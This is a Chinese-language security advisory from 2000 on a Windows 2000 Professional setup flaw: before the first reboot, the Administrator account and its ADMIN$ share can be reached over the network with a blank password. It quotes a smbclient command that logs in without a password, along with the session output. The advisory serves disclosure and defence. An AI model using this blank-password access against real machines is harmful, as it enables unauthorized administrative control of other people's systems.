Win2K Pro在安装过程中存在安全漏洞
此安全漏洞发布时间为 2000年二月16日 by Stephane Aubert

影响的版本:
Microsoft Windows 2000 Professional 
漏洞描述:
 根据Stephane的报道,在安装Win2K Pro的过程中任一用户都能够在不提供密码的情况下访问
管理员帐号共享的ADMIN$共享,该ADMIN$共享被映射为Windows操作系统中的根目录.
 Stephane证实了在安装的过程中Administrator实际上是定义了的,但是,根据观测指出,该密码
必须要到系统重新启动的时候才能够生效.在系统重新启动前这段时间内,任何人都可以使用一个空白
的口令访问Administrator帐号.还没有被证实的是,这个漏洞是否能够被用来在这段时间内修改管理员
帐号的密码.
 这个问题指出:在安装到系统的网络层已经被激活而系统还没有重新启动的时候,入侵者可以通过网络
控制你的Win2000系统.在这段时间内系统中所有的资源都有可能暴露.
 Stephane使用"smbclient"工具证实了这个bug,该工具随SAMBA发布.下面是入侵的过程中输出的状态:

=====================
% ./smbclient \\\\WINDOZE\\ADMIN$ -I xxx.yyy.zzz.ttt -U 'administrator' -d 0 -N

Unable to open configuration file "/usr/local/samba/lib/smb.conf"!
pm_process retuned false
Can't load /usr/local/samba/lib/smb.conf - run testparm to debug it
Domain=[GROAR] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

smb: \>
=====================